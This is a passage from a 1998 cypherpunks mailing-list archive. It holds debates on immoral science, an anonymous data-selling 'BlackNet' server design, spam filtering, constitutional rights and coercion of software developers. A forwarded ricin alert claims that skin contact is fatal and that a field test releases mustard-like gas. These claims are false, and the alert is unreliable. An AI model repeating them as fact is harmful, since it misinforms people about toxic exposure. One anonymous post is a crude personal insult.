Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Jan 1998 17:12:20 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.5.32.19980113222020.0088f100@popd.ix.netcom.com>
Message-ID: <199801140905.BAA28777@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




[nazi death studies]
>Did most of that work rate as "immoral science" - I'd say so.

uh huh
but we have a problem. I thought "technology is neutral".
hmmmmm, maybe technology != science.....?

>A few users like oil companies have workers in the Arctic, and 
>most moral organizations are more concerned about preventing accidents 
>and minimizing risks to workers than getting away with
>as much damage to their workers as they can; there are still
>some legitimate uses of the knowledge like how to do medical
>care for freezing-related accident victims, or extreme situations
>like nuclear power-plant disaster cleanup.  But not a lot.

interesting book on this a friend told me about: "toxic 
sludge is good for you" -- describes for example
how many oil companies are creating an effective *facade* 
based on very aggressive PR campaigns.

if anyone wants good info on the state of our times, and
how our government has been hijacked.... check this one
out. it shows that as savvy as "you" think you are
(you is anybody here), we're all living in a gingerbread
fantasy world created by the mass media-- even when you're
not tuned into it.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 09:54:44 +0800
To: eternity@internexus.net
Subject: Re: (eternity) Automating BlackNet Services
In-Reply-To: <199801140008.BAA17146@basement.replay.com>
Message-ID: <199801140142.BAA00388@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Scratch Monkey writes:
> Here's a way to do an automated "high risk" server, using many of the
> same methods as the eternity implementation but with longer delays and
> more security for the server.

This design ties in pretty well with what I understood Tim May's
suggestion to be of using BlackNet to provide eternity services.

I notice that you are assuming that all document delivery would be via
digital dead-drop (alt.anonymous.messages).

Depending on the usage pattern of this service it has the potential to
be higher bandwidth than by Eternity USENET design.  The BlackNet with
dead-drop only scheme you propose will become more expensive in
bandwidth than Eternity USENET at the point at which the volume of
satisfied document requests being posted to USENET for different
recipients exceeds the volume required to repost the traffic at the
desired update rate.  This is because you may have multiple requests
for the same document, all of which must be posted to
alt.anonymous.messages.

One thing you could do to reduce this overhead would be to combine
requests for the same document.  To do this you could add an extra
delay to satisfying requests to increase the chances of accumulating
more requests for the same document.  Alternatively, documents which
were sent out within the last 24 hours or so could have just the bulk
symmetric key encrypted for the subsequent recipients sent together
with a message-id.  (A separated multiple crypto recipient block).

A more subtle problem you would probably want to address with this
design is that you don't really want anonymous requested documents to
be linkable, so you would need to do stealth encoding of the messages.
This tends to be more complex for multiple recipients, but it is
doable, and is made easier by standardising on public key size.


In general I think I consider my Eternity USENET design more secure
than your design and of similar overhead depending on whether the
usage pattern results in lower bandwidth.  I make this claim because
users are offered better security with E-USENET because they are
completely anonymous, and don't need to submit requests.  They can
passively read E-USENET, perhaps on a university campus, or with a
satellite USENET feed.  The readers are much harder to detect.

This is significant because remailers are complex to use, and the
users should be assumed to be less technically able (ie more likely to
screw up remailer usage).

Publisher anonymity is of basically the same security.


A lower bandwidth alternative, to either E-USENET or what you have
termed Automated BlackNet alternative is therefore to send messages
via use-once mixmaster remailer reply blocks of the sort used by some
nymservers.  Clearly this is also lower security because the user must
creating reply blocks which ultimately point back to himself.

However the performance win is big.  With this architecture BlackNet
can win significantly over E-USENET because the volume is reduced to
just indexes of available documents.

Also I consider indexes are probably low enough risk for people to
mirror on the web or cache on the web or whatever.  My E-USENET
prototype design has a separate index mechanism.

(I understand there is some magic inside mixmaster which prevents
packet replay, which helps avoid message flood attacks, though didn't
locate the code fragment responsible for this functionality when I
examined the sources.)


Also I found your use of hashes and passwords so that the server does
not necessarily know what it is serving interesting.  I have similar
functionality in my prototype E-USENET implementation.

I mainly included the functionality because the prototype is also
being used as an publically accessible eternity USENET proxy, to allow
the operator to marginally reduce risks.  I think this approach is of
marginal value, in that the attacker will be easily able to compile an
index from the same information as users.

This is really a form of secret splitting: the key is one part, and
the data the other part.  The key can be considered to be part of the
URL.

> Both the client and server software should be trivial to write, and in
> fact I am working on that now. The server is partially written, but I am
> at a handicap because I do not have access to usenet at this time. If
> anyone knows of some canned code (preferably sh or c, but perl would work)
> that will perform functions such as "Retrieve list of articles in
> newsgroup x" and "Retrieve article number y", a pointer would be nice.

	http://www.dcs.ex.ac.uk/~aba/eternity/

I have done most of the work already I think.  What you are trying to
do is so similar that you should be able to acheive what you want with
some light hacking of my perl code.

For testing purposes I am in the same position as you; dialup ppp
connection and linux machine.  What I did was to implement both
newspool access code, and NNTP access code.

For local testing I just create a dummy news-spool.  The eternity
distribution comes with a few documents in this dummy news spool.  A
real local news spool would work also.

Then you can simulate everything you want offline.  You can change the
config file to switch to an open access NNTP news-server at any time
for a live test.

All the code to read USENET is there, and to scan chosen NNTP headers,
etc.  I would highly recommend perl as a rapid prototyping language.
What you see took 3 days (long days, mind, motivation was at an all
time high around then).

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Wed, 14 Jan 1998 17:49:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
Message-ID: <3.0.32.19980114014522.00720408@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote, in reference to "immoral science" vs immoral *scientists*:

>Depends.  [#invoke Godwin's Law]
>Consider the Nazi studies done on human susceptibility to freezing,
>poisons, torture, etc., and the followon work done by various
>evil empires.  Some of it was just done for fun,
>but some of it _was_ real science, with hypotheses and experiments, 
	[..etc...]
.............................................................

I was being picky/particular.   Because consider that science does not
conduct itself:  it is a method developed by scientists, and it is
*conducted by* them.   They determine what is the right manner in which to
conduct their experiments, they figure out how to determine what is valid
in terms of proofs.   Their findings, to be valid, must relate to the
actual nature of things, to reality.   But then, being humans, scientists
must consider what all of this "means" to us, or about us, upon reflection.

If after a time, scientists have come to depend on the "scientific method"
(as established by other scientists in the past) to determine what they
shall do, how they should proceed, and have given up on doing some of their
own current reasoning on methodologies;  if they are not sensitive to the
meaning or validity of what they do, then this would be to say that it is
"science" which is at fault when they inflict torture, for example, rather
than those individuals who engage in those experiments.

But this is like the tail wagging the dog, or like the typical Nazi excuse
that "the State made me do it":  "Science determined that the experiment
had to be conducted this way, in order to achieve true knowledge; I had no
choice."   I say it is the scientist who makes the science immoral, if it
be judged to be so, not vice-versa.

As for the concept of morality, which I'm sure will be the next controversy
brought up by someone:

It is a difficult thing to pin down what morality/immorality is, because
because it is an abstract concept which requires a comprehensive view on
humanity, conscience, and concepts of "goodness", and because it is so
mixed up with notions from religion and associations with any number of
unrelated ideas and concepts.

Generally it can be agreed that someone who liberally and insensitively
creates pain and destruction upon humans is not "one of us",
psychologically.  An educator (Montessori) explained it thus:
	
"Good is life; evil is death; the real distinction is as clear as the
words."  Anything which goes of the direction of life is good (and moral)
while anything which goes in the other direction is of the opposite character.

"The 'moral sense' ... is to a great extent the sense of sympathy with our
fellows, the comprehension of their sorrows, the sentiment of justice; the
lack of these sentiments convulses normal life.  We cannot become moral by
committing codes and their application to memory, for memory might fail us
a thousand times, and the slightest passion might overcome us; criminals,
in fact, even when they are most astute and wary students of codes, often
violate them; while normal persons, although entirely ignorant of the laws,
never transgress them, owing to 'an internal sense which guides them'. "

Those who have become insensitive to this internal guidance system are
generally dangerous, and risky to be around, even if you don't want to
identify their inclinations as "immoral".



    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 09:55:58 +0800
To: cypherpunks@cyberpass.net
Subject: (fwd) Automating BlackNet Services
Message-ID: <199801140147.BAA00399@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Scratch Monkey, a nym, described this BlackNet variant on the eternity
list(*), which raises some interesting issues I think.  

I am currently forwarding eternity discussion backwards and forwards
between the lists and adding Cc's on my replies.

Adam

(*) To subscribe see http://www.dcs.ex.ac.uk/~aba/eternity/ there is a
CGI form to subscribe, or send message with body "subscribe eternity"
to majordomo@internexus.net.

------- Start of forwarded message -------
To: eternity@internexus.net
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay Associates, L.L.P.
Subject: (eternity) Automating BlackNet Services
Sender: owner-eternity@internexus.net
Precedence: bulk

On Tue, 13 Jan 1998, Adam Back wrote:

> This suggests that another approach would be to have two classes of
> services.  Users of high risk documents can put up with 24 hour turn
> around, and lower risk documents can be served by an alternate
> service, intermediate risk documents can exist by using low risk
> resources until detection.

Here's a way to do an automated "high risk" server, using many of the
same methods as the eternity implementation but with longer delays and
more security for the server.

For now I am calling this scheme (which is not much more than an automated
participant in the BlackNet scheme) ABNS, for Automated BlackNet Server.

1) Server program resides on host with large disk and full news feed.
2) Server program watches alt.anonymous.messages.
3) Alice anonymously posts data to alt.anonymous.messages, in a format
   similar to eternity documents. However, the data would typicaly be
   encrypted to the public key(s) of the 
4) Server notices the message, processes it and stores the data.
5) Bob anonymously posts a request for a document to
   alt.anonymous.messages.
6) Server notices the request, and anonymously posts a public key to
   alt.anonymous.messages along with a statement that the requested 
   document is available.
7) Bob notices the post from the server, and anonymously posts a second
   request to alt.anonymous.messages, this time encrypted with the
   server's public key. This second request could include Bob's public
   key.
8) The server notices and decrypts the second request, and anonymously 
   posts the requested document to alt.anonymous.messages, encrypted with
   Bob's public key if one was provided.

The reason for steps 6 and 7 are to prevent multiple servers from
responding to the same request with (potentialy) very large files. Of
course, if Bob knew the data was available from a particular ABNS, he
could skip steps 5 and 6.

Both the client and server software should be trivial to write, and in
fact I am working on that now. The server is partially written, but I am
at a handicap because I do not have access to usenet at this time. If
anyone knows of some canned code (preferably sh or c, but perl would work)
that will perform functions such as "Retrieve list of articles in
newsgroup x" and "Retrieve article number y", a pointer would be nice.

So far, this is not too exciting, but the addition of a couple of extra
technologies could make it very usefull... 

If the "Steganographic File System" being proposed by Ross Anderson comes
to fruition, the ABNS could recieve a filename and password as part of
each submission, and then promptly 'forget' them. In this way, not only
does the server not have access to the contents of the file, it doesn't
even know what files it has! Retrieval requests would include the
appropriate information to enable the server to fetch the data.

The addition of digital cash to the picture would make it really viable,
because the server could charge for storage, or retrieval, or both. 

So picture this:

Alice has some data she wants to sell. She encrypts this data to the
public key of an ABNS, along with the filename and password to be used for
file access and an amount of cash sufficient to pay for storage costs for
maybe 6 months. She would also specify a 'value' for the data, which the
ABNS will charge for access to this data and of which Alice will recieve a
cut. She could also send a small advertisement (for which here storage
fees should be minimal) as a separate document, and give it a value of
zero.

The server decrypts the message and verifies the cash. It then stores the
file in the designated filename/password location in the SFS (stego file
system). It makes a hash of the filename/password, and stores this hash
in a 'table of contents' file that would also contain:
- - the 'paid-until' date for the data.
- - the public key of the submitter.
- - the 'price' for the data

It would then forget the filename and password.

Bob learns of the existance of the data (how? I haven't thought about that
yet but it doesn't seem to me that it would present much of a problem) and
wishes to purchase it. He sends a message to the server by encrypting to
the server's public key and posting to alt.anonymous.messages. In his
message he includes the filename/password of the data he wants, along with
an appropriate amount of cash and Bob's public key.

The server decrypts Bob's request: 

- - First, it pockets the cash. (Everything else is just to keep customers)
- - It then creates a hash based on the filename/password of the data that
  Bob is requesting. 
- - It looks up that hash in the table of contents file.
- - If it is not found, it anonymously posts a message encrypted to Bob's
  public key indicating that the data is not available, but that Bob now
  has a line of credit at this particular ABNS. :)  
- - If it _does_ find the hash in the contents file, it checks the
  paid-until date. 
- - If the file is not paid up, the server treats it as if the file were not
  present (and in fact, it deletes the file at this time, something it
  could not do without the filename/password that Bob supplied). 
- - If the file is present, and storage fees are paid up, and Bob has
  enclosed enough cash (or has enough credit), the ABNS accesses the file
  in the stego filesystem and anon-posts it to Bob's public key.
- - The server then forgets the filename/password, but remembers the hash.
- - Of the 'fee' collected from Bob, the server allocates it as follows:
  - 70% is kept.
  - 10% is credited to the hash retrieved by Bob, to extend it's "Paid up"
    time. This means that documents that bring in a lot of money can pay
    for thier own storage costs, without the contributer needing to keep 
    paying.
  - 20% is encrypted to the public key listed in the table of contents and
    posted to alt.anonymous.messages, as a royalty to the contributor.
  Of course, this is just one possible policy for the server to have.
  Market forces will shape the eventual pricing scheme.

I'm actualy not sure if such a system would be used, because Alice may
have no motivation to send her data to an ABNS when she can run the server
herself and take 100% of the money. Comments on this aspect of operation
would be appreciated.

Either way, the same software could be used. I hope to post initial
versions within a couple of weeks, assuming I can hack myself some account
with nntp access for testing.

-Scratch Monkey-
85d8e7d860504ba9e90527e7e89210d7

This is a new persistant nym. PGP key(s) will be posted soon, and 
I will verify that the keys belong to the same person who posted this
message by providing the string that produces the md5 hash above.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 17:55:30 +0800
To: Bill Stewart <cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.32.19980112191309.0069b3d8@cnw.com>
Message-ID: <v03102804b0e238146c15@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:20 PM -0800 1/13/98, Bill Stewart wrote:

>Consider the Nazi studies done on human susceptibility to freezing,
>poisons, torture, etc., and the followon work done by various
>evil empires.  Some of it was just done for fun,
>but some of it _was_ real science, with hypotheses and experiments,
>and there's only so much research you can do into the
>resistence of the body to serious damage without actually
>damaging live bodies, most accidental damage to human bodies
>isn't done in sufficiently instrumented environments to be useful,
>and it's just _damn_ hard to get good volunteers these days.
>Did most of that work rate as "immoral science" - I'd say so.

I think it's an error to use "moral" or "immoral" as a modifier for "science."

It's a matter of opinion/ethics as to whether some science is "for immoral
purposes," but calling something "immoral science" is fraught with trouble.

To a vegetarian, any science related to meat production is "immoral science."

To a devout pacifist, any science related to weapons in any way is "immoral
science."

To an Orthodox Jew, any science done on the Sabbath is "immoral science."

To a Communist, any science which refutes scientific socialism is "immoral
science."

To the Catholic Church, circa 1500, any science which challenged the
earth-centric view was "immoral science."

Personally, I don't view scientific experiments done on condemned prisoners
as immoral. If a human being has already been sentenced to die, and, for
example, accepts some payment (perhaps for his heirs) to die in some
scientifically interesting way, why call it "immoral"?

While I would not have, I hope, worked in a Nazi death camp, the science
obtained is undeniably real science, some of the only solid data we have on
freezing humans, on exposing them to pathogens, etc.

(BTW, there are those who believe using placebos in experiments involving
life-threatening situations (like diseases) is "immoral science." I view it
as a necessary way to do science in this arena. So long as the patients are
informed as to the protocol, and understand they may randomly end up in the
placebo group, I have no problems. Nonetheless, the fact that some or all
in the control group will die in the experiment is deemed by some to be
"immoral.")


--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 14 Jan 1998 11:17:42 +0800
To: cypherpunks@toad.com
Subject: Rincin AP
Message-ID: <199801140309.EAA12439@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Forward from Terrorism list:

From: JCHV72A@prodigy.com (MR JAMES P DENNEY)
Date: Tue, 13 Jan 1998 19:45:44, -0500
To: TERRORISM@mediccom.org
Subject: RICIN ALERT

Bureau of Narcotic Enforcement
Merced/Mariposa Narcotic Task Force

RE: RICIN Alert

The Sacramento Regional Office of the Bureau of Narcotic Enforcement 
has offered this alert to all it's personnel:

  "The following alert has been confirmed and is being shared 
  throughout the law enforcement and intelligence community.

  This alert advises that nationwide trend among drug traffickers is to 
  "bait" law enforcement officers with a white powder called RICIN. 
  RICIN is a derivative of Castor beans and looks like powder 
  methamphetamine. It is highly toxic and if it contacts human skin, it 
  is fatal. The death process takes several days, depending upon the 
  dosage, and is almost impossible to detect during an autopsy.

  Forensic experts advise that if you field test RICIN in the Scott 
  Reagent Kit, it will foam and bubble extensively. The test will also 
  produce a gas that is very similar to mustard gas and can also be 
  lethal if inhaled. RICIN is 6,000 times more lethal than cyanide and 
  there is no antidote. Symptoms of contact exposure to RICIN are: 
  Fever, cough, weakness, and hypothermia, progressing to dangerously 
  low blood pressure, heart failure and death.

  Due to this situation, in the event of suspect drug seziures, do not 
  come into direct skin contact with any powdered substances, and 
  exhibit caution of field testing any powdered substances."

We are forwarding this advisory to all California EMS Agencies and 
recommend that each agency contact the local hospitals in their area. 
We are unaware if RICIN can be detected on a toxicological exam.

There is a potential for someone, other than law enforcement, to 
become contaminated with this substance.

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Wed, 14 Jan 1998 18:33:12 +0800
To: cypherpunks@toad.com
Subject: Re: Spam
In-Reply-To: <l03020901b0ded4fdda62@[209.130.130.104]>
Message-ID: <l03020902b0e22b447f0b@[209.130.131.63]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>Losing third-party relay is rather a shame - the Internet used to
>be a cooperative system where everybody tried to get mail through,
>and avoiding third-party relay is more complex if your users
>have lots of different domain names (e.g. www.foo.com hosted at
>bigisp.net).  It also pushes the net more in the direction of
>all mail needing to have True Names, which is a Bad Thing,
>and decreases robustness of the overall system.

[snip]

>Another approach to reducing spam is of course to keep contacting
>ISPs to kill off bad users, and to get ISPs to refuse spamhauses
>as customers.

I do see the validity of your argument, and I do agree
about forcing everybody to have a "True Name" to not
necessarily be a good thing.  Then again, a few years
ago the marketing industry (if it may be called that)
had no idea the "wealth" they could produce by using the
Internet for relatively cheap advertising.

I love Eudora for a very simple reason: the simplicity
of the filters offered in even the free version.  While
the simplicity also bars complex filters that take care
of a bunch of e-mail in one pop, it does allow for layering.
I have various levels in my filtering system: content-
based, like filtering for PGP messages, stupid crap
from Vulis or threads I don't feel like following.  Next
comes the To: filters -- I've got a number of different
e-mail boxes, each with its own purpose.  If I get mail
auto-forwarded from any of my secondary accounts, it falls
through these filters and is dropped into the correct
folders.  After that come the sender-based filters.  If
there is mail for me from an anonymous source that is not
addressed to me, and doesn't contain content that interests
me, it's dropped into the trash.  Then all the mail from
persistant spam domains that I allready know about gets
thrown in the trash.   If any mail comes FROM a mailing
list, instead of being sent TO a mailing list, it's the
next to go.  After all that, I filter the To: line for all
my mailing lists, and each bit of mail is sent into the
correct folder as above.

After all that rot, if the mail in question doesn't contain
my address in the To: or Cc: lines (except recipient list
repressed mail, which is sometimes interesting), it too is
dropped into my *SPAM folder and the subject is changed
accordingly, which then wraps up 99% of all the spam that I
receive, and I forward the headers to the appropriate ISPs.

There is a "simple" solution to this, and it isn't government
legislation.  If spammers want to be smart about it and
AVOID legislation by power-hungry politicians, all they
have to do is subscribe to spam ISPs that are set up for the
express purpose of spamming.  It doesn't matter how many of
them are out there, really, or what mailing lists are abused:
those who are receptive to spam will respond, and those of
us who hate spam can set up blacklists that detail all the
spam ISPs that we encounter, and circulate those lists.  It
then becomes insanely easy to receive no more than ONE message
from each spam ISP (they could create a new domain tag, .spm),
and everybody's happy.

If the spammers would be smart enough to put the effort into
creating such a network, much as we have, for discussing
issues that matter to us, then they would be in a lot less
trouble, and fewer people would be calling for their heads.

Or am I wrong? :)

Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
- ---
As kinky as it sounds, finger me to see my PGP key and
confirm the signature attached to this message.  Either
that, or head for pgp.ai.mit.edu on the WWW and search
for my e-mail address.
- ---
Any and all SPAM will be met with immediate prosecutory
efforts.  Solicitations are NOT welcome here!
- ---
        ----BEGIN INFLAMATORY BLOCK----
Version: 160 (IQ)
Comments: Definitely one of their greatest misses.

Reporter: "Do you know what Public Enemy is?"
- ---
Citizen: "Public enemy?"
          [long pause]
         "Probably somebody in office."
        -----END INFLAMATORY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNLyC+gBMw4+NR29ZAQGhowf/f35tihuAl6b+IH8FD7P4dGQR9+t1JKwq
rt7CT7eYrJ7ZJ2KO/YZlmufVmaeVGac0eN4MkrjHj8TIvAMKtxegWnmd0GLmp+cI
QUwuVGKN2Fab6sxvQjwKaLDPjgQFSBiOS6Rsm8jnSstPbtD/dmgcEf2+svW+edXH
oivyKeSF0VcdCcYPDX/+sRiKKbB8ZdMimAqNuIEboGQjOIMLVkwnWsxKQH+XIw3/
fdBOAEPLNj0Tz6R2v3W2XLgewZsmJpjELoZl7ZYYNpdm5h6h80JdXCoC6vOSDsEu
ATwsvvRQw0wcKvgB0fsBhpO9u0KdHk0NYuPr2i/Z9oxoMbo8h7hoZQ==
=OfnS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Wed, 14 Jan 1998 18:32:07 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom Forum report (freedom of association)
In-Reply-To: <19971226.145900.12766.0.Lord_Buttmonkey@juno.com>
Message-ID: <l03020903b0e2326e2e11@[209.130.131.63]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>These arguments are all smoke and mirrors unless we figure
>out where authority lies (? ;-)

With the people of this country.  There that was simple. :)

>As far as I'm concerned freedom of association is implied by
>freedom of assembly.  To assemble in this context obviously
>means to associate. If it doesn't, then what the hell is it?
>To come together in order to work things out?  Is that
>association?  In the context of assembling for commerce,
>commerce is just assembling and agreeing on the terms of
>free association.

Okay, my point was simply that an assumed right shouldn't
HAVE to be implied under the existing constitution.  Either
we have to find a way to list all our freedoms at once and
then guarantee them definitively, or we have to not guarantee
them on paper, so as to not LIMIT them TO paper.

I'm assuming that the bill of rights was written in this
spirit -- our forefathers listed and guaranteed all of our
rights that had been previously contested by King George.
I can only assume that they had no idea the kind of civil
war they would start over rights that they didn't see as
being threatened but must (in today's world) be guaranteed
by law in order to be valid.

I mean, hell how to you spell out the right to privacy in
leagalese, in one paragraph?  You can't, not in today's
society.  Everybody's definition has a different spin, and
all of the ones based on common sense are correct.

>The authority of a Supreme Court was challenged by Thomas
>Jefferson, who speculated that if such a court were the
>ultimate arbiter of justice, then a tyranny of the judiciary
>would follow.

Nine judges, appointed for life, who therefore never run
for election (even though they are selected and confirmed
by elected officials).  Whomever chooses them influences the
political philosophy driving that court for years and years
after their term of office has expired.  I entirely agree with
Thomas Jefferson.  Interestingly enough, the constitution
doesn't say a damn thing about "judicial review."  It was
a power that the supreme court granted unto itself, something
that the court itself would challange if either of the other
two branches of government tried that...

Personally, I think the voters should decide exactly what
the supreme court can do (since it's rather vaguely defined
in the constitution), and then give themselves to vote on
who will be put in those nine chairs.

>So who ultimately judges?  I should think having a federal
>body judge the constitutional limitations of the federal
>government is an obvious conflict of interest.

I think the idea behind it all was to say that, in putting
nine judges in the highest court and giving them lifetime
terms, they then have the ability to make decisions without
facing the wrath of the other two brances.  You're correct,
however.  A man who represents himself in a court of law
has a fool for a client, and this holds true for the Fed.

>In any case,
>anyone willing to read the constitution and do just a little
>bit of homework will find out that the constitution is a
>*limitation* of the powers of the federal government, not a
>broad grant.

Thank you, thank you! :)

>[little know fact: Earl Warren, noted Supreme Court
>"Justice" was the designer of the Japanese-American Prison
>camps in the US during WWII]

I didn't know that.

>Before someone starts spouting off on "our living
>constitution"(TM) someone please tell me why they didn't
>strike out the conflicting parts of the constitution when
>they "grew" it?  Something like "amendments number one, two,
>five, nine and ten should be amended to read "unless we say
>otherwise".  Alterations of public law almost always specify
>the previous laws that are struck down.  In fact, if memory
>serves, the repeal of prohibition specifically alters the
>amendment that created it.

Actually, I think the "unless we say so" clause is allready
in there, in most if not all ammendments (unless I'm
mistaken).  It reads something to the effect of Congress
having the athority to draft any and all laws that assist in
the upholding of whatever part of the constitution that the
clause is included in.  I think it's called the "elastic
clause," if memory serves me correctly (where's my copy of
the constitution that has all the $2 bills with the signing
of the declaration of independance on the back stuffed into
the middle?!).

>(It is left as an excercise to the reader to figure out why
>prohibition needed an amendment to the constitution while
>prohibition of other mind altering substances did not ;-)

I think what happened was that the prohibition ammendent was
drafted in the "do MORE good!" days following the United State's
successes in the first world war.  A time of "good feelings"
was in effect, and since the evil Germans had been stamped out,
folks figured that stamping out other evils was also a good thing.

How ironic that the repealing ammendment immediately followed
the woman's sufferage ammendment.  It's like the country woke
up from a bad hangover...

>Have a day.

Allways do. :)

Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
- ---
As kinky as it sounds, finger me to see my PGP key and
confirm the signature attached to this message.  Either
that, or head for pgp.ai.mit.edu on the WWW and search
for my e-mail address.
- ---
Any and all SPAM will be met with immediate prosecutory
efforts.  Solicitations are NOT welcome here!
- ---
        ----BEGIN INFLAMATORY BLOCK----
Version: 160 (IQ)
Comments: Definitely one of their greatest misses.

Reporter: "Do you know what Public Enemy is?"
- ---
Citizen: "Public enemy?"
          [long pause]
         "Probably somebody in office."
        -----END INFLAMATORY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNLyDBQBMw4+NR29ZAQHRuAf/VijkwXb/H2uXRuObeNsAdpgysKmMvEWr
1ufctl9e+BtbeByLLLmH22qudsl76xrVA5EHq8qHOHixZQTDayb7lfeTBHBwnrkI
Z79ZT5EUyjIBM6V6Iad2Qtit7ePkeGG52UqKYU1cbruEQkyM4FZc2js2kbG/uky6
53+ez/wvdBYwIbB8PnTRkrE8ZDC+21hHFH+5Aw4wSRP0cyHfslu8uWg4DM1O2car
VQqxvy1XYEKv3uXoF/l8v/iw3kAwXpaJzhViEnOAuli21nVip8xa+3zG+sMyY4Gg
us8wvVeqqNANNu8WG9WAUqV0OmGaWObNC6QGnVOqBGoKulmoDFFdjw==
=Fsmr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Wed, 14 Jan 1998 20:14:36 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <bf1b9794ddc3d6471703ef5f1c448eb0@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Timmy May's 16Kb brain's single convolution is directly wired to his 
rectum for input and his T1 mouth for output. That's 16K bits, not 
bytes. Anal intercourse has caused extensive brain damage.

         \
        o/\_ Timmy May
       <\__,\
        '\,  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Wed, 14 Jan 1998 21:51:34 +0800
To: cypherpunks@cyberpass.net
Subject: how to release code if the programmer is a target for coercion
Message-ID: <199801141341.IAA29112@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Tim May brought this issue up recently -- if someone develops a greatest-
thing-since-sliced-bread Eternity package, then releases it. it's pretty
likely that they will eventually be approached by (mi6/mossad/CIA/KCIA/etc.).

What's likely to happen?

Certainly they could kill you.  They could make it look like random street
crime, or an accident, or kill you with #16 000 in your pocket just to make
it clear what their reasons were (Gerald Bull, Mossad, London, .32acp).  
At best, you could force them to make it very obvious it was murder, by
having paranoid levels of security, but they could still kill you.  If they
kill the programmer (s/programmer/programmers, or just enough that
the project becomes disorganized, etc.), that at worst will keep new releases
of the software from coming out.  At least until another group starts
working on things, assuming protocols and/or source are public.  Perhaps
that new group would be a front for the NSA, though.  A risk.

More likely, they'd try to coerce you.  This could include threats of death,
which are best responded to by ignoring them, since they don't gain anything
if they kill you.  Or torture, which is equally ineffective if they kill you.
Or slander/etc. to try to discredit you. (unlikely to work at least among
cypherpunks, in the absence of technical attacks as well).

Most likely, they would try to buy you.  This could be by outright offering
money for back doors, which would be great if it worked, but is unlikely to
happen in the first place.  If offered a bribe, you could go public with
that fact (preferably after taking the money :), and worst case publically
distance yourself from the project.  More likely, they could try to infiltrate
the technical team covertly, or ask for features which happen to be 
non-public security compromises, perhaps under the guise of security 
improvements (this presumes they are beyond the state of the art).


WOrst case, one can say that if the intelligence community is far beyond
the state of the art, you have no chance at protecting against covertly
modified source code, modified to break in a subtle way which is not known
to the general community.  However, the world is already in this position --
if they solved the DLP, or even knew of subtle bugs in a processor, or 
whatever,
tools would already be weak.

Assuming the intelligence community is not so advanced that thorough inspection
by the world at large won't reveal back doors or weaknesses, the solution
is code review by the public.  It was brought up that verifying PGP was
just about at the limit of the world's capability.   I agree that it is
certainly beyond the level of one person, or even a small group, to verify --
plus, you want code verified by enough non-interacting entities that it is
unlikely they can all be bought.

I was looking around for a solution to this -- Lenny Foner at the MIT
Media lab has something for his agents project which might be a solution.
A system by which sections of source code are verified by individuals,
signed, other sections are verified by others, etc.  Then, during
compilation, you could say something like "all of the security
critical code must be verified by at least one of these 12 people, everything
else by at least 5 people per section in this list of distinct people".  It
would then show where the "threadbare" sections are, and you could optionally
verify them yourself, have someone else verify them for money, or post
to cypherpunks asking for help.

Security critical code should be encapsulated fairly well anyway -- I'd
feel a lot worse about having a bug in such a part of my code than
a screen refresh bug.  One could potentially limit unintended side effects
by running security code on its own processor, in its own sandbox, or
just use a different instance of the JVM to run it.

I think technical means can solve the problem of source code review
and intelligence community rubber hose tactics.  (preferably they'll
still be handing out free money anyway, though)

-- 
Ryan Lackey
